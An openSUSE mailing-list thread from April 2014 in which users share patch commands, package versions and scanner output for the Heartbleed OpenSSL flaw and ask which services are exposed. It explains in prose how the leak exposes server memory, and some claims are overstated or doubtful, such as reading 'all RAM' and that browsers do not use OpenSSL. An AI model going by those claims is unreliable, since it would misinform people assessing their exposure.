I ran away to update a virtual server I run. Remember on all your openSUSE 12.3 AND 13.1 machines: sudo zypper in -t patch openSUSE-2014-277 Use "sudo rpm -qa | grep ssl" to confirm you have the latest patched version. This is the package list from the security announcement: - openSUSE 13.1 (i586 x86_64): libopenssl-devel-1.0.1e-11.32.1 libopenssl1_0_0-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-1.0.1e-11.32.1 openssl-1.0.1e-11.32.1 openssl-debuginfo-1.0.1e-11.32.1 openssl-debugsource-1.0.1e-11.32.1 - openSUSE 13.1 (x86_64): libopenssl-devel-32bit-1.0.1e-11.32.1 libopenssl1_0_0-32bit-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1 - openSUSE 13.1 (noarch): openssl-doc-1.0.1e-11.32.1 - openSUSE 12.3 (i586 x86_64): libopenssl-devel-1.0.1e-1.44.1 libopenssl1_0_0-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-1.0.1e-1.44.1 openssl-1.0.1e-1.44.1 openssl-debuginfo-1.0.1e-1.44.1 openssl-debugsource-1.0.1e-1.44.1 - openSUSE 12.3 (x86_64): libopenssl-devel-32bit-1.0.1e-1.44.1 libopenssl1_0_0-32bit-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1 - openSUSE 12.3 (noarch): openssl-doc-1.0.1e-1.44.1 My questions below: On Thu, Apr 10, 2014 at 10:39 AM, Christopher Myers <cmyers@mail.millikin.edu> wrote:
Well... I applied the patches mentioned in the email I'd sent a few minutes ago to my 12.2 box, and after doing so, the heartbleed python script no longer flags it:
user@computer:~/Desktop/heartbleed> python ssltest.py my.server Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 1286 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4 Sending heartbeat request... Unexpected EOF receiving record header - server closed connection No heartbeat response received, server likely not vulnerable
So, I'm guessing it's ok? No odd issues as of yet.
It it just HTTPS connections we have to worry about. I read that SSH is safe because it doesn't use it does not use the TLS protocol that is the core of the vulnerability. For secure FTP, it uses SSH so that should be safe as well. What about POP / IMAP / SMTP? Do any of those have susceptibility to heartbleed? Greg -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 04/10/2014 09:49 AM, Greg Freemyer wrote:
It it just HTTPS connections we have to worry about.
I read that SSH is safe because it doesn't use it does not use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
I've read that it affects anything that uses the openSSL libs: HTTPS SMTP (submission port 587) POP (port 995) IMAP (port 993) XMPP (chat servers) SSL VPNs (!!!!) Various network appliances, including security stacks. (!!!!) etc, etc, etc. Apparently each heartbeat packet can return only 64-KB of data, but subsequent ones can return other 64-KB areas. Thus, the hacker could just walk through all RAM and suck whatever's there. What's there? Usernames, passwords, PKI keys (both public and private!!!), and depending on what you've been doing, your SSH public/private keys. Since the data exfiltration is completely silent and no connections are logged, you'd never know if you've been hacked! This one is bad indeed. Regards, Lew -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 04/10/14 19:14, Lew Wolfgang wrote:
On 04/10/2014 09:49 AM, Greg Freemyer wrote:
It it just HTTPS connections we have to worry about.
I read that SSH is safe because it doesn't use it does not use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
I've read that it affects anything that uses the openSSL libs:
HTTPS SMTP (submission port 587) POP (port 995) IMAP (port 993) XMPP (chat servers) SSL VPNs (!!!!) Various network appliances, including security stacks. (!!!!) etc, etc, etc.
Don't forget clients (mostly CLI apps like curl) when they connected to a malicious server. AFAIK, Browsers don't use OpenSSL, so there is no problem. Joachim -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Joachim Schrod, Roedermark, Germany Email: jschrod@acm.org -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On Thursday, April 10, 2014 12:49:03 PM Greg Freemyer wrote:
I ran away to update a virtual server I run.
Remember on all your openSUSE 12.3 AND 13.1 machines:
sudo zypper in -t patch openSUSE-2014-277
Use "sudo rpm -qa | grep ssl" to confirm you have the latest patched version.
This is the package list from the security announcement:
- openSUSE 13.1 (i586 x86_64):
libopenssl-devel-1.0.1e-11.32.1 libopenssl1_0_0-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-1.0.1e-11.32.1 openssl-1.0.1e-11.32.1 openssl-debuginfo-1.0.1e-11.32.1 openssl-debugsource-1.0.1e-11.32.1
- openSUSE 13.1 (x86_64):
libopenssl-devel-32bit-1.0.1e-11.32.1 libopenssl1_0_0-32bit-1.0.1e-11.32.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1
- openSUSE 13.1 (noarch):
openssl-doc-1.0.1e-11.32.1
- openSUSE 12.3 (i586 x86_64):
libopenssl-devel-1.0.1e-1.44.1 libopenssl1_0_0-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-1.0.1e-1.44.1 openssl-1.0.1e-1.44.1 openssl-debuginfo-1.0.1e-1.44.1 openssl-debugsource-1.0.1e-1.44.1
- openSUSE 12.3 (x86_64):
libopenssl-devel-32bit-1.0.1e-1.44.1 libopenssl1_0_0-32bit-1.0.1e-1.44.1 libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1
- openSUSE 12.3 (noarch):
openssl-doc-1.0.1e-1.44.1
My questions below:
On Thu, Apr 10, 2014 at 10:39 AM, Christopher Myers
<cmyers@mail.millikin.edu> wrote:
Well... I applied the patches mentioned in the email I'd sent a few minutes ago to my 12.2 box, and after doing so, the heartbleed python script no longer flags it:
user@computer:~/Desktop/heartbleed> python ssltest.py my.server Connecting... Sending Client Hello... Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 1286 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request... Unexpected EOF receiving record header - server closed connection No heartbeat response received, server likely not vulnerable
So, I'm guessing it's ok? No odd issues as of yet.
It it just HTTPS connections we have to worry about.
I read that SSH is safe because it doesn't use it does not use the TLS protocol that is the core of the vulnerability.
For secure FTP, it uses SSH so that should be safe as well.
What about POP / IMAP / SMTP?
Do any of those have susceptibility to heartbleed?
Greg Just a comment on your remember to run: CODE
sudo zypper in -t patch openSUSE-2014-277 /CODE I installed from the openSUSE repo today an update to libopenssl. Then I took your suggestion and ran the code to run the patch. I got the following so I assume the update includes the patch; CODE ---------- x5b8:~> sudo zypper in -t patch openSUSE-2014-277 root's password: Loading repository data... Reading installed packages... 'patch:openSUSE-2014-277' is already installed. Resolving package dependencies... Nothing to do. /CODE Thanks for posting the options and information. Now I need to check all my secure website (Bank, etc) to see if they are fixed. Russ -- openSUSE 13.1(Linux 3.11.10-7-desktop x86_64| Intel(R) Quad Core(TM) i5-4440 CPU @ 3.10GHz|8GB DDR3| GeForce 8400GS (NVIDIA-Linux-x86_64-331.49)|KDE 4.12.4 -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
participants (4)
-
Greg Freemyer -
Joachim Schrod -
Lew Wolfgang -
upscope